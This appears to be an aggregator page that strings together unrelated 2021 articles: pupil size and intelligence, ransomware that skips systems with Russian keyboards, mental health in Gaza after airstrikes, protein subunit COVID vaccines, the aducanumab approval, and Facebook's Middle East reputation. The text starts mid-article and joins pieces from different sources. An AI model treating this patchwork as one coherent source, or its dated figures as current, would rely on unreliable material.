As one example of an attention control test, participants had to resist glancing toward a bold, flickering asterisk on one side of a computer screen and instead rapidly look in the opposite direction to identify a letter. The letter would disappear within moments, so even a brief eye movement toward the flickering asterisk could result in missing it. Humans are primed to react to objects passing through their peripheral vision—it’s what once allowed us to spot a predator or prey—but this task required participants to redirect their focus from the flicking asterisk to the letter.

We found that a larger baseline pupil size was correlated with greater fluid intelligence, attention control and, to a lesser degree, working memory capacity—indicating a fascinating relationship between the brain and eye. Interestingly, pupil size was negatively correlated with age: older participants tended to have smaller, more constricted, pupils. Once standardized for age, however, the relationship between pupil size and cognitive ability remained.

But why does pupil size correlate with intelligence? To answer this question, we need to understand what is going on in the brain. Pupil size is related to activity in the locus coeruleus, a nucleus situated in the upper brain stem with far-reaching neural connections to the rest of the brain. The locus coeruleus releases norepinephrine, which functions as both a neurotransmitter and hormone in the brain and body, and it regulates processes such as perception, attention, learning and memory. It also helps maintain a healthy organization of brain activity so that distant brain regions can work together to accomplish challenging tasks and goals. Dysfunction of the locus coeruleus, and the resulting breakdown of organized brain activity, has been related to several conditions, including Alzheimer’s disease and attention deficit hyperactivity disorder. In fact, this organization of activity is so important that the brain devotes most of its energy to maintain it, even when we are not doing anything at all—such as when we stare at a blank computer screen for minutes on end.

One hypothesis is that people who have larger pupils at rest have greater regulation of activity by the locus coeruleus, which benefits cognitive performance and resting-state brain function. Additional research is needed to explore this possibility and determine why larger pupils are associated with higher fluid intelligence and attention control. But it’s clear that there is more happening than meets the eye.

Try This One Weird Trick Russian Hackers Hate

Try This One Weird Trick Russian Hackers Hate

 
May 17, 2021
 

In a Twitter discussion last week on ransomware attacks, KrebsOnSecurity noted that virtually all ransomware strains have a built-in failsafe designed to cover the backsides of the malware purveyors: They simply will not install on a Microsoft Windows computer that already has one of many types of virtual keyboards installed — such as Russian or Ukrainian. So many readers had questions in response to the tweet that I thought it was worth a blog post exploring this one weird cyber defense trick.

The Commonwealth of Independent States (CIS) more or less matches the exclusion list on an awful lot of malware coming out of Eastern Europe.

The Twitter thread came up in a discussion on the ransomware attack against Colonial Pipeline, which earlier this month shut down 5,500 miles of fuel pipe for nearly a week, causing fuel station supply shortages throughout the country and driving up prices. The FBI said the attack was the work of DarkSide, a new-ish ransomware-as-a-service offering that says it targets only large corporations.

DarkSide and other Russian-language affiliate moneymaking programs have long barred their criminal associates from installing malicious software on computers in a host of Eastern European countries, including Ukraine and Russia. This prohibition dates back to the earliest days of organized cybercrime, and it is intended to minimize scrutiny and interference from local authorities.

In Russia, for example, authorities there generally will not initiate a cybercrime investigation against one of their own unless a company or individual within the country’s borders files an official complaint as a victim. Ensuring that no affiliates can produce victims in their own countries is the easiest way for these criminals to stay off the radar of domestic law enforcement agencies.

Possibly feeling the heat from being referenced in President Biden’s Executive Order on cybersecurity this past week, the DarkSide group sought to distance itself from their attack against Colonial Pipeline. In a message posted to its victim shaming blog, DarkSide tried to say it was “apolitical” and that it didn’t wish to participate in geopolitics.

“Our goal is to make money, and not creating problems for society,” the DarkSide criminals wrote last week. “From today we introduce moderation and check each company that our partners want to encrypt to avoid social consequences in the future.”

But here’s the thing: Digital extortion gangs like DarkSide take great care to make their entire platforms geopolitical, because their malware is engineered to work only in certain parts of the world.

DarkSide, like a great many other malware strains, has a hard-coded do-not-install list of countries which are the principal members of the Commonwealth of Independent States (CIS) — former Soviet satellites that mostly have favorable relations with the Kremlin. The full exclusion list in DarkSide (published by Cybereason) is below:

Image: Cybereason.

Simply put, countless malware strains will check for the presence of one of these languages on the system, and if they’re detected the malware will exit and fail to install.

[Side note. Many security experts have pointed to connections between the DarkSide and REvil (a.k.a. “Sodinokibi”) ransomware groups. REvil was previously known as GandCrab, and one of the many things GandCrab had in common with REvil was that both programs barred affiliates from infecting victims in Syria. As we can see from the chart above, Syria is also exempted from infections by DarkSide ransomware. And DarkSide itself proved their connection to REvil this past week when it announced it was closing up shop after its servers and bitcoin funds were seized.]

CAVEAT EMPTOR

Will installing one of these languages keep your Windows computer safe from all malware? Absolutely not. There is plenty of malware that doesn’t care where in the world you are. And there is no substitute for adopting a defense-in-depth posture, and avoiding risky behaviors online.

But is there really a downside to taking this simple, free, prophylactic approach? None that I can see, other than perhaps a sinking feeling of capitulation. The worst that could happen is that you accidentally toggle the language settings and all your menu options are in Russian.

If this happens (and the first time it does the experience may be a bit jarring) hit the Windows key and the space bar at the same time; if you have more than one language installed you will see the ability to quickly toggle from one to the other. The little box that pops up when one hits that keyboard combo looks like this:

Cybercriminals are notoriously responsive to defenses which cut into their profitability, so why wouldn’t the bad guys just change things up and start ignoring the language check? Well, they certainly can and maybe even will do that (a recent version of DarkSide analyzed by Mandiant did not perform the system language check).

But doing so increases the risk to their personal safety and fortunes by some non-trivial amount, said Allison Nixon, chief research officer at New York City-based cyber investigations firm Unit221B.

Nixon said because of Russia’s unique legal culture, criminal hackers in that country employ these checks to ensure they are only attacking victims outside of the country.

“This is for their legal protection,” Nixon said. “Installing a Cyrillic keyboard, or changing a specific registry entry to say ‘RU’, and so forth, might be enough to convince malware that you are Russian and off limits. This can technically be used as a ‘vaccine’ against Russian malware.”

Nixon said if enough people do this in large numbers, it may in the short term protect some people, but more importantly in the long term it forces Russian hackers to make a choice: Risk losing legal protections, or risk losing income.

“Essentially, Russian hackers will end up facing the same difficulty that defenders in the West must face — the fact that it is very difficult to tell the difference between a domestic machine and a foreign machine masquerading as a domestic one,” she said.

KrebsOnSecurity asked Nixon’s colleague at Unit221B — founder Lance James — what he thought about the efficacy of another anti-malware approach suggested by Twitter followers who chimed in on last week’s discussion: Adding entries to the Windows registry that specify the system is running as a virtual machine (VM). In a bid to stymie analysis by antivirus and security firms, some malware authors have traditionally configured their malware to quit installing if it detects it is running in a virtual environment.

But James said this prohibition is no longer quite so common, particularly since so many organizations have transitioned to virtual environments for everyday use.

“Being a virtual machine doesn’t stop malware like it used to,” James said. “In fact, a lot of the ransomware we’re seeing now is running on VMs.”

But James says he loves the idea of everyone adding a language from the CIS country list so much he’s produced his own clickable two-line Windows batch script that adds a Russian language reference in the specific Windows registry keys that are checked by malware. The script effectively allows one’s Windows PC to look like it has a Russian keyboard installed without actually downloading the added script libraries from Microsoft.

To install a different keyboard language on a Windows 10 computer the old fashioned way, hit the Windows key and X at the same time, then select Settings, and then select “Time and Language.” Select Language, and then scroll down and you should see an option to install another character set. Pick one, and the language should be installed the next time you reboot. Again, if for some reason you need to toggle between languages, Windows+Spacebar is your friend.

Gaza:Recent bombings by Israel have caused a Mental Health Crisis

A New Mental Health Crisis Is Raging in Gaza

Recent bombings by Israel have caused more than just physical trauma

 
A New Mental Health Crisis Is Raging in Gaza
Civil defense workers pore through rubble on May 16, 2021, in the aftermath of an Israeli bombing. Credit: Fatima Shbair Getty Images

“Have you ever seen a six-month old baby with exaggerated startle response?” One of my colleagues who works on our telephone counseling service was calling me for advice on how to respond to several distraught mothers asking her how to help their babies who had started showing such distressing symptoms of trauma during the recent bombing. Our telephone service was back and responding to callers on the third day of the attacks on Gaza, though of course with certain difficulties.

The question took me back 20 years to when I was a young resident in the pediatric department at Nasser hospital in Khan Younis, Gaza’s second biggest city, in the southern part of the Gaza Strip. Then, my plan was to become a pediatrician. The hospital, on the western side of the city was not far from the Israeli settlements. Often in the middle of the night I used to receive mothers arriving in the pediatric emergency department with tiny children who had started screaming with no clear reason. Physical examination mostly revealed nothing abnormal. Perhaps this was the trigger that made me train to become a psychiatrist.

During those nights, you could often hear shooting from inside the Israeli settlement’s high fortifications, with the bullets mostly ending in the walls of the Palestinian homes and other buildings that faced the settlements. That was the common experience we adults were used to, and of course something that children, even the very youngest, also had to live with.

Thinking about those mothers and babies, I then asked myself about the likely psychological consequences of this 11-day offensive on the people of the Gaza Strip, and how it is going to be different from 2014’s Gaza war which lasted for seven weeks through July and August, including a ground invasion into Gaza. There were then 2,251 Palestinians killed and 11,000 wounded. 

AFTER THE 2014 WAR

In 2014, we formed in the Gaza Community Mental Health Program (GCMHP) what we called crisis response teams, that were usually composed of a man and a woman, both psychologists. Their main task was to provide Psychological First Aid: to give some psychological support and detect and refer cases in need of further interventions to our three community centers. Parents often were talking about changes that their children had begun experiencing. Children were having poor concentration, sleeping difficulties and night terrors, bed-wetting and irritability. Younger children were clinging to their parents.

During the four months that followed the attacks in 2014, 51 percent of children visiting our centers were diagnosed with post-traumatic stress disorder (PTSD), another 11 percent were diagnosed with bedwetting. For adults, 31 percent were diagnosed with PTSD while 25 percent were diagnosed with depression. During those months, almost 20 percent of the people that were visited by the crisis teams were referred to our community centers for further assessment and therapy. The U.N. Children’s Emergency Fund (UNICEF) reported then that more than 370,000 children were in need of mental health and psychosocial intervention. Would these figures predict anything for after the 2021 offensive?         

ELEVEN DAYS

We know now the physical effects: at least 242 people were killed in Gaza, including 66 children, 38 women (four pregnant) and 17 elderly people. The injured are around 1,948 people—an iconic figure for every Palestinian. It includes 610 children and 398 women and 102 elderly people. Moderate-to-severe injuries affect 25 percent of the injured. During the offensive 107,000 people were internally displaced with about two thirds of them seeking shelter at United Nations Relief and Works Agency schools.

We saw six hospitals and 11 clinics damaged, and there are some ironic stories. It was on May 17 that the Rimal primary health care center situated within the Ministry of Health (MoH) compound in Gaza city was attacked. The center included the main laboratory for COVID-19 tests and was partially affected. The MoH had to stop the testing and asked people who were supposed to get their second shot of vaccine to go to Al-Daraj primary health care center across Gaza City. However, that center, too, came under attack, as there was a house in the area that was bombed in an air strike. The Rimal clinic was also the place to get vaccinated in Gaza city. Luckily the damage to both clinics was partial and the Rimal clinic soon resumed service. However, a young physician, Dr Majed Salha was severely injured on his head, and his condition is critical.

ONGOING MENTAL HEALTH CHALLENGES

Only weeks ago, COVID was the main concern in Gaza as in any other place in the world. People calling our telephone counseling line at GCMHP or people we were meeting either in the community or at the community centers presented with two main and interlinked complaints or challenges. One was how deeply the economic conditions were affecting their lives. The unemployment rate in Gaza, even before the bombings, was 43.1 percent, and for people under 30 it was 65.5 percent. Even among those working, many are in casual employment, living from hand to mouth. Taxi drivers, or those who sell vegetables at the open markets were badly affected by the COVID-related restrictions on movement and other measures such as social distancing and closing of some of those open markets. Depression and high anxiety were rife as men were unable to provide either sanitizers or simply food for their families.

The second fear was always how to deal with their children under such restrictions and with schools closed. We have on average five children per household, and we live in one of the most crowded areas in the world with more than 13,000 persons in one square mile. Those children, not being allowed to leave their homes because of COVID restrictions, were badly in need of support.

Two weeks before the offensive the MoH was dealing with the second wave of COVID with about 35 to 40 percent of the people being tested showing positive. Suddenly those COVID-related concerns were overshadowed by the fears related to the airstrikes, the bombing and survival. How is that going to impact the psychological wellbeing of the population?

AN UNPRECEDENTED EXPERIENCE

In one night, it was reported, 160 warplanes attacked 450 targets in less than 40 minutes in northern areas of the Gaza Strip. The strikes happened at the same time as 500 artillery shells were fired. People from outside Gaza asked us if this experience was similar to what happened in 2008 when the first strike took place. On Saturday, December 27, 2008, at around 11:20 A.M., suddenly people in the whole Gaza strip were overwhelmed with the sounds of bombardment and the view of a huge mushroomlike smoke plume that was all over the place. It was a moment where children were either going to schools (afternoon shift) or returning from schools (morning shift) and everyone really was in a state of shock. At that moment about 60 fighter planes carried the first attack in less than one minute. People asked us whether this felt the same. Perhaps it looks the same, but there is a critical major difference.

In 2008 the bombing was a single minute or two minutes, and it was across the whole Gaza strip (140 square miles). But what happened in these 11 days is entirely different. The strikes continued for about 25 to 30 minutes, or sometimes up to 40 minutes in the same city or geographical area. You could hear continuous bombing in your own city, in your own small geographical area, that continued for about 25 to 40 minutes. In all that time neither you nor your children nor your wife nor any other family member would feel that they could take even a single breath.

The continuous bombardment and shelling that continued in different cities on different nights meant that no one really could feel any moment of safety. All of us had our nervous system at its very highest alarm level for more than 25 and up to 40 minutes. I can say that this is the most fearful experience that I have had throughout four large offensives over the years.

This type of attack caused extreme fear to the two-million population, traumatizing almost everyone.

Another key difference to keep in mind is that most of the areas that were attacked were in the heart of the cities. We witnessed the flattening of 13- or 14-story towers and many other buildings. Some families were just eliminated during those attacks. In Al-Shati camp one family had 10 people killed including eight children and two women. Fourteen families lost more than three members and some of them were killed outright.

The fear and terror that we lived with through the 11 days was something unprecedented. So, do we expect to see more people and with a similar diagnosis to 2014, or 2012, or 2008? Maybe, but definitely the lower number of people who were killed or injured does not indicate a lesser psychological impact on the population. We already see children presented with night terrors, and pains in their knees and abdomen, and parents report clinging sons and daughters. Men and women alike complain of joint pains, low back pain and difficulty in concentration. Many say that they are not sure if they are living a big dream or a reality. And the worst-affected people show severe psychological impact including dissociative symptoms. In any case, we are still in early days and we will need more time to have a better understanding of the impact.

One might think that this will be our only concern, but that is not the case. In the first few days after the ceasefire with COVID testing resumed, only a few hundred tests were made, but on average one third of the results were positive. Tens of thousands of people were displaced and stayed in school classes or at their relatives’ homes, making the whole community inevitably much more mixed and crowded. As you may imagine, COVID measures were not all carried out.

Our hospitals are already full of injured people, the health system is struggling. And it seems that we are on the verge of a third COVID wave. A wave where out of the two million people only 40,000 have been vaccinated. We have just escaped the hell of airstrikes to find the hell of COVID-19 at our doors. We are moving from living under occupation and offensive to life under occupation and blockade, with COVID.

Ours is a life that you will never understand unless you are a resident of Gaza. Outsiders love to call us resilient human beings, rather than see our reality. As the English poet T. S. Eliot wrote in 1936, “Humankind cannot bear very much reality.”

A New Type Of COVID-19 Vaccine

A New Type Of COVID-19 Vaccine Could Debut Soon

 

A vial of the experimental Novavax coronavirus vaccine is ready for use in a London study in 2020. Novavax’s vaccine candidate contains a noninfectious bit of the virus — the spike protein — with a substance called an adjuvant added that helps the body generate a strong immune response.

Alastair Grant/AP

A new kind of COVID-19 vaccine could be available as soon as this summer.

It’s what’s known as a protein subunit vaccine. It works somewhat differently from the current crop of vaccines authorized for use in the U.S. but is based on a well-understood technology and doesn’t require special refrigeration.

In general, vaccines work by showing people’s immune systems something that looks like the virus but really isn’t. Consider it an advance warning; if the real virus ever turns up, the immune system is ready to try to squelch it.

In the case of the coronavirus, that “something” is one of the proteins in the virus — the spike protein.

The vaccines made by Johnson & Johnson, Moderna and Pfizer contain genetic instructions for the spike protein, and it’s up to the cells in our bodies to make the protein itself.

The first protein subunit COVID-19 vaccine to become available will likely come from the biotech company, Novavax. In contrast to the three vaccines already authorized in the U.S., it contains the spike protein itself — no need to make it, it’s already made — along with an adjuvant that enhances the immune system’s response, to make the vaccine even more protective.

Protein subunit vaccines made this way have been around for a while. There are vaccines on the market for hepatitis B and pertussis based on this technology.

Article continues after sponsor message

 

 

 

A large test of the Novavax COVID-19 vaccine’s effectiveness, conducted in tens of thousands of volunteers in the United States and Mexico, is about to wrap up. Dr. Gregory Glenn, president of research and development for Novavax, told an audience at a recent webinar hosted by the International Society for Vaccines that “we anticipate filing for authorization in the U.K., U.S. and Europe in the third quarter.”

Turning plants into factories

To make the virus protein, Novavax uses giant vats of cells grown in the lab. But there’s another way to make the protein: Get plants in a greenhouse to do it.

That’s the approach being used by the Canadian biotech firm Medicago.

The plants used are related to the tobacco plant, and have been modified to contain the genetic instructions to make the viral protein.

The plants do something very valuable — they make a lipid shell that surrounds a bunch of the viral proteins, with the proteins sticking out.

“The plant will assemble the protein in a shape and form that is looking like the virus,” says Nathalie Landry, Medicago’s executive vice president for scientific and medical affairs. “So, if you look at an image of it, it looks like a virus, but it cannot induce any disease. But when [it’s] injected as a vaccine your body will raise a good immune response.”

 

Early studies suggest Medicago’s candidate vaccine does just that, and the company is confident enough in those findings that it’s already begun a large study in people that could involve as many as 30,000 volunteers in 11 countries.

Landry acknowledges that development of the Medicago COVID-19 vaccine has lagged behind others.

“We’re a latecomer, but we’re coming,” she says.

Another latecomer that’s coming is the pharmaceutical giant Sanofi. Its protein subunit vaccine against the coronavirus is also grown in cells in the lab.

Late last year the company was getting ready to mount a large study of the vaccine’s effectiveness when the early results in a smaller group of people showed it did not seem to be inducing the immune response that would be protective.

“Especially in elderly individuals in that study, it was not as immunogenic as it should be,” says Dr. Paul Goepfert at the University of Alabama at Birmingham, who was one of the researchers involved in those early studies. He says the issue turned out to be an incorrect calculation of the dose of vaccine being delivered.

“So instead of giving 10 micrograms of the dose, they were actually giving one microgram,” Goepfert says.

Sanofi has fixed that problem and repeated the early studies with good results. The company is now enrolling volunteers in a large efficacy trial.

Goepfert says it’ll be a good thing if all these vaccines make it to consumers. But that alone isn’t going to solve the problem of getting people vaccinated.

Why? “Because the vaccines that we have now are just beyond our wildest dreams kind of effective,” he says. “And I’m living in a state right now where it just frustrates me how slow our vaccine uptake is.”

Goepfert lives in Alabama. According to the latest numbers from the Centers for Disease Control and Prevention, only Mississippi has a lower per capita rate of vaccination.

 

_____________

What are protein subunit vaccines and how could they be used against COVID-19?

All vaccines work by exposing the body to molecules from the target pathogen to trigger an immune response – but the method of exposure varies. Here’s how subunit vaccines work.

TOPICS:COVID19
1.3kShares
facebook sharing button
twitter sharing button
linkedin sharing button
messenger sharing button
whatsapp sharing button

AT A GLANCE

Rather than injecting a whole pathogen to trigger an immune response, subunit vaccines (sometimes called acellular vaccines) contain purified pieces of it, which have been specially selected for their ability to stimulate immune cells. Because these fragments are incapable of causing disease, subunit vaccines are considered very safe. There are several types: protein subunit vaccines contain specific isolated proteins from viral or bacterial pathogens; polysaccharide vaccines contain chains of sugar molecules (polysaccharides) found in the cell walls of some bacteria; conjugate subunit vaccines bind a polysaccharide chain to a carrier protein to try and boost the immune response. Only protein subunit vaccines are being developed against the virus that causes COVID-19.

Other subunit vaccines are already in widespread use. Examples include the hepatitis B and acellular pertussis vaccines (protein subunit), the pneumococcal polysaccharide vaccine (polysaccharide), and the MenACWY vaccine, which contains polysaccharides from the surface of four types of the bacteria which causes meningococcal disease joined to diphtheria or tetanus toxoid (conjugate subunit).

ADVANTAGES AND DISADVANTAGES OF PROTEIN SUBUNIT VACCINES

Well-established technology

Suitable for people with compromised immune systems

No live components, so no risk of the vaccine triggering disease

Relatively stable

Relatively complex to manufacture

Adjuvants and booster shots may be required

Determining the best antigen combination takes time

HOW DO SUBUNIT VACCINES TRIGGER IMMUNITY?

Subunit vaccines contain fragments of protein and/or polysaccharide from the pathogen, which have been carefully studied to identify which combinations of these molecules are likely to produce a strong and effective immune response. By restricting the immune system’s access to the pathogen in this way, the risk of side effects is minimised. Such vaccines are also relatively cheap and easy to produce, and more stable than those containing whole viruses or bacteria.

A downside of this precision is that the antigens used to elicit an immune response may lack molecular structures called pathogen-associated molecular patterns which are common to a class of pathogen. These structures can be read by immune cells and recognised as danger signals, so their absence may result in a weaker immune response. Also, because the antigens do not infect cells, subunit vaccines mainly only trigger antibody-mediated immune responses. Again, this means the immune response may be weaker than with other types of vaccines. To overcome this problem, subunit vaccines are sometimes delivered alongside adjuvants (agents that stimulate the immune system) and booster doses may be required.

HOW EASY ARE THEY TO MANUFACTURE?

All subunit vaccines are made using living organisms, such as bacteria and yeast, which require substrates on which to grow them, and strict hygiene to avoid contamination with other organisms. This makes them more expensive to produce than chemically-synthesised vaccines, such as RNA vaccines. The precise manufacturing method depends on the type of subunit vaccine being produced. Protein subunit vaccines, such as the recombinant hepatitis B vaccine, are made by inserting the genetic code for the antigen into yeast cells, which are relatively easy to grow and capable of synthesising large amounts of protein. The yeast is grown in large fermentation tanks, and then split open, allowing the antigen to be harvested. This purified protein is then added to other vaccine components, such as preservatives to keep it stable, and adjuvants to boost the immune response – in this case alum. For polysaccharide or conjugate vaccines, the polysaccharide is produced by growing bacteria in industrial bioreactors, before splitting them open and harvesting the polysaccharide from their cell walls. In the case of conjugate vaccines, the protein that the polysaccharide is attached to must also be prepared by growing a different type of bacteria in separate bioreactors. Once its proteins are harvested, they are chemically attached to the polysaccharide, and then the remaining vaccine components added.

_____________

Aducanumab, new drug for Alzheimer’s

Explained: Aducanumab, new drug for Alzheimer’s disease and row over approval

Early in November 2020, the drug was denied approval after a marathon seven-hour long virtual meeting with the federal medical panel disagreeing with the claims.

ADVERTISEMENT
Aducanumab

 
Aducanumab will be sold under the brand name of Aduhelm. (Photo: AP)
 

The American Food and Drug Administration (FDA) on Monday approved a drug for Alzheimer’s disease, the first in nearly two decades. This decision of the FDA has become controversial with experts saying that clinical trials of the drug had returned unsatisfactory.

There are 30 million people suffering from Alzheimer’s disease globally. Of them, about 6 million are in the US, where the drug has been approved for usage.

Developed by Biogen, the drug named Aducanumab is said to slow down the progression of Alzheimer’s disease that affects the functioning of the brain. The approval came following months of debate within the medical circles over the procedures in recommending its use for the debilitating disease.

The development of a drug to treat Alzheimer’s disease has been slow due to the lack of definitive proof of its working. (Getty)

What is Alzheimer’s disease and how does Aducanumab work?

Alzheimer’s disease is the most common form of dementia and contributes 60-70 per cent of the cases. According to the World Health Organisation (WHO), it is a syndrome in which there is deterioration in memory, thinking, behaviour and the ability to perform everyday activities.

Dementia is one of the major causes of disability and dependencies among older people worldwide. The disease has a physical, psychological, social, and economic impact not only on people who are suffering from it but also on immediate families.

ADVERTISEMENT

The disease, categorised in three stages, is identified with symptoms such as forgetfulness, losing track of time, having increasing difficulty with communication, difficulty in recognising faces and experiencing behaviour changes that may escalate and include aggression.

Experts believe that the drug will reach about eight per cent of Americans with mild Alzheimer’s disease by 2025. (Photo: Getty)

Aducanumab, which will be sold under the brand name of Aduhelm, is a monoclonal (referring to cloning of unique immunity cell) antibody that reduces amyloid-beta, which is a protein that leads to plaque formation in the brain. Plaque formation happens due to the accumulation of debris in the brain from neuron breakdown. The drug works to slow the deterioration process of the brain by reducing this plaque formation. However, there is no evidence to support that the drug will help in memory recovery.

The drug is the first since 2003 to attack the biological underpinnings of the disease, instead of just postponing the symptoms.

Controversy: Insufficient data to support efficacy

The development of a drug to treat Alzheimer’s disease has been slow due to the lack of definitive proof of its working in memory recovery and reducing disease progression.

ADVERTISEMENT

While Aducanumab has been approved by FDA, there has been a major controversy over the clinical trials conducted to test the drug. The approval was based on two phase-3 trials. While the first showed some improvement in patients, the second failed to show any benefit.

During the clinical trials of the drug, 40 per cent of the phase-3 trial participants, who received a higher dosage of Aducanumab, experienced brain swelling or bleeding. According to reports, most were either asymptomatic or had headaches, dizziness or nausea. However, no phase-3 participant died due to drug trial.

The disease, categorised in three stages, is identified with symptoms such as forgetfulness, losing track of time. (Photo: Getty)

Early in November 2020, the drug was denied approval after a marathon seven-hour long virtual meeting with the medical panel disagreeing with the claims. Ten out of 11 members of the federal panel of medical experts voted that it was “not reasonable to consider the research presented as “primary evidence of the effectiveness of Aducanumab for the treatment of Alzheimer’s disease,” the New York Times reported.

ADVERTISEMENT

The approval is a departure from the FDA’s established process that requires two convincing studies before a drug is used. Scientists are worried that the decision could lower the standards required for getting a medical product approved. The FDA has now asked Biogen to conduct another clinical trial.

There is no evidence to support that the drug will help in memory recovery. (Photo: AP)

Soaring prospects for Biogen

The approval will bring massive financial gains for Biogen, which saw its shares gain 38 per cent after the nod to its drug. The company has said that it would charge an average of $56,000 a year per patient to use the drug which is going to be one of the best-selling pharmaceutical products in the world.

The company expects nearly 900 sites to be ready to administer the drug in the US alone. However, there are chances that the demand might exceed, creating a supply shortage. Experts believe that the drug will reach about eight per cent of Americans with mild Alzheimer’s disease by 2025, minting $7 billion in revenue for Biogen in the process.

The newly developed drug is likely to overshadow the five medicines previously approved to treat the brain condition in one way or the other. The existing drugs to treat Alzheimer’s disease are Aricept, Razadyne, Exelon, Namenda and Namzaric.

 

Aducanumab, the first treatment attacking likely cause of Alzheimer’s, approved in the US

  • 08/06/2021
  • Reuters
  •  
Elderly lady.
“This is good news for patients with Alzheimer’s disease.” Photo credit: Getty Images

US regulators on Monday (local time) approved Biogen Inc’s aducanumab as the first treatment to attack a likely cause of Alzheimer’s disease despite controversy over whether the clinical evidence proves the drug works.

Aducanumab aims to remove sticky deposits of a protein called amyloid-beta from the brains of patients in earlier stages of Alzheimer’s in order to stave off its ravages, which include memory loss and the inability to care for one’s self.

“This is good news for patients with Alzheimer’s disease. We’ve not had a disease-modifying therapy approved ever,” said Ronald Petersen, an Alzheimer’s disease expert at the Mayo Clinic.

However, he cautioned, “This is not a cure. It’s hoped that this will slow the progression of the disease.”

“I think this is a big day,” Dr Peterson said. “But we can’t overpromise.”

Alzheimer’s is the sixth-leading cause of death in the US.

The Food and Drug Administration (FDA) said on its website clinical trials for the treatment, to be sold under the brand name Aduhelm, showed a reduction in the plaques that are expected to lead to a slower decline in patients.

“Although the Aduhelm data are complicated with respect to its clinical benefits, FDA has determined that there is substantial evidence that Aduhelm reduces amyloid-beta plaques in the brain and that the reduction in these plaques is reasonably likely to predict important benefits to patients,” the agency said in a statement.

Biogen shares rose as much as 3 percent on Monday before being halted up 0.1 percent at $286.42 ahead of the FDA decision. The US-traded shares partner Eisai Co rose $33.50, or 45 percent, to $107.75

The price of the treatment was not immediately available.

Biogen’s drug had been hailed by patient advocates and some neurologists eager to have an effective option for patients with the lethal disease. Other doctors said clinical trial results were inconsistent and more proof was needed.

‘A win-win for all’

Current Alzheimer’s treatments including AbbVie’s Namenda and Pfizer’s Aricept are intended to ease Alzheimer’s symptoms, while the Biogen drug is the first-ever approved to target the underlying cause of dementia and slow progression.

The FDA said Biogen will need to conduct a post-approval trial to verify Aduhelm’s clinical benefit, and that it could be pulled from the market if the drug does not work as intended.

“I think they made the right decision, said Howard Fillit, chief science officer of the Alzheimer’s Drug Discovery Foundation.

“It makes the drug available to patients while requiring the company to do more research to prove its benefit. I think it’s a win-win for all.”

Aducanumab was studied in patients with early disease who test positive for a component of amyloid brain plaques.

Some trial patients in trials experienced potentially dangerous brain swelling. The FDA advised patients who experience the side effect should be monitored but not necessarily taken off the drug.

The FDA decision did not define the specific Alzheimer’s patients for who the treatment is appropriate – such as very early stage disease – raising the possibility that the patient population could be larger than anticipated. The FDA was not immediately available for comment.

Biogen has estimated that around 1.5 million US citizens would be eligible for treatment with aducanumab, which is given by monthly infusion, raising concerns about costs to the healthcare system.

The number of Americans living with Alzheimer’s is expected to rise to around 13 million by 2050 from more than 6 million currently, according to the Alzheimer’s Association.

“We think the drug has the potential to generate [at least] $10 billion in peak sales, and believe a successful launch of aducanumab has the potential to completely change the profile of the company,” said Guggenheim analyst Yatin Suneja.

Biogen and partner Eisai Co had scrapped development of the drug in March 2019, then reversed course in October, saying a more detailed data analysis showed some patients with very early forms of the disease benefited from taking higher doses over an extended period of time.

Wall Street analysts had forecast that an FDA approval of Biogen’s drug could reinvigorate a field that has been abandoned by many large pharmaceutical companies.

The amyloid theory has been at the center of Alzheimer’s research for many years with a long list of failures to show for it, and seemed on life support until Biogen revived its aducanumab program.

Shares of companies developing Alzheimer’s treatments also jumped, with AC Immune SA and Anavex Life Sciences up between 14 percent and 17 percent, while shares of Eli Lilly and Co and Axsome Therapeutics rose more than 5 percent.

The Institute for Clinical and Economic Review, an influential drug pricing research group, in a May report cited “insufficient” evidence that aducanumab provides a net health benefit. It said data so far indicate a cost-effective price of no more than $8300 per year.

Looking only at favourable trial results, that price rises as high as $23,100, ICER said

The research group put the fair price for any drug proven to halt the progression of Alzheimer’s-related dementia at $50,000 to $70,000 per year.

Facebook is grappling with a reputation crisis in the Middle East

Facebook battles reputation crisis in the Middle East

“Users are feeling that they are being censored, getting limited distribution, and ultimately silenced,” one Facebook senior software engineer said.
Conclusion of the DLD Innovation Conference

Nick Clegg, Head of Policy at Facebook, speaks on stage during the DLD (Digital Life Design) innovation conference in Munich, Bavaria on Jan. 20, 2020.Lino Mirgeler / dpa/picture alliance via Getty Images file

 
 

Facebook is grappling with a reputation crisis in the Middle East, with plummeting approval rates and advertising sales in Arab countries, according to leaked documents obtained by NBC News.

The shift corresponds with the widespread belief by pro-Palestinian and free speech activists that the social media company has been disproportionately silencing Palestinian voices on its apps – which include Facebook, Instagram and WhatsApp – during this month’s Israel-Hamas conflict. Examples include the deletion of hundreds of posts condemning the eviction of Palestinians from the Sheikh Jarrah neighborhood of Jerusalem, the suspension of activist accounts and the temporary blocking of a hashtag relating to one of Islam’s holiest mosques. Facebook said these were technical glitches.

 

Instagram has taken the greatest reputational hit, according to a presentation authored by a Dubai-based Facebook employee that was leaked to NBC News, with its approval ratings among users falling to a historical low.

The social media company regularly polls users of Facebook and Instagram about how much they believe the company cares about them. Facebook converts the results into a ‘Cares About Users’ metric which acts as a bellwether for the apps’ popularity. Since the start of the latest Israel-Hamas conflict, the metric among Instagram users in Facebook’s Middle East and North Africa region is at its lowest in history, and fell almost 5 percentage points in a week, according to the research. “The biggest changes came from Qatar, Jordan, Palestine and Saudi Arabia,” the presentation states.

Instagram’s score measuring whether users think the app is good for the world, referred to as ‘Good For World,’ has also dropped in the region to its lowest level after losing more than 5 percentage points in a week.

There was also a dip — although not as precipitous — in Facebook’s ‘Cares About Users’ score in the Middle East, driven mainly by Egypt, Iraq, Morocco and Jordan.

The low approval ratings have been compounded by a campaign by pro-Palestinian and free speech activists to target Facebook with 1-star reviews on the Apple and Google app stores. The campaign tanked Facebook’s average rating from above 4 out of 5 stars on both app stores to 2.2 on the App Store and 2.3 on Google Play as of Wednesday. According to leaked internal posts, the issue has been categorized internally as a “severity 1” problem for Facebook, which is the second highest priority issue after a “severity 0” incident, which is reserved for when the website is down.

“Users are feeling that they are being censored, getting limited distribution, and ultimately silenced,” one senior software engineer said in a post on Facebook’s internal message board. “As a result, our users have started protesting by leaving 1 star reviews.”

Internal documents connect the reputational damage to a decline in advertising sales in the Middle East. According to the leaked presentation, Facebook’s ad sales in the United Arab Emirates, Egypt, Morocco, Saudi Arabia, Kuwait, Qatar and Iraq dropped at least 12 percent in the 10 days after May 7.

“In addition to the negative sentiment towards Facebook in MENA now, the regression could also be attributed to the overall charged environment where some brands might find it insensitive to advertise or won’t be getting the usual ROI when spending their money,” Facebook noted in a presentation deck on the topic, referring to the return on investment.

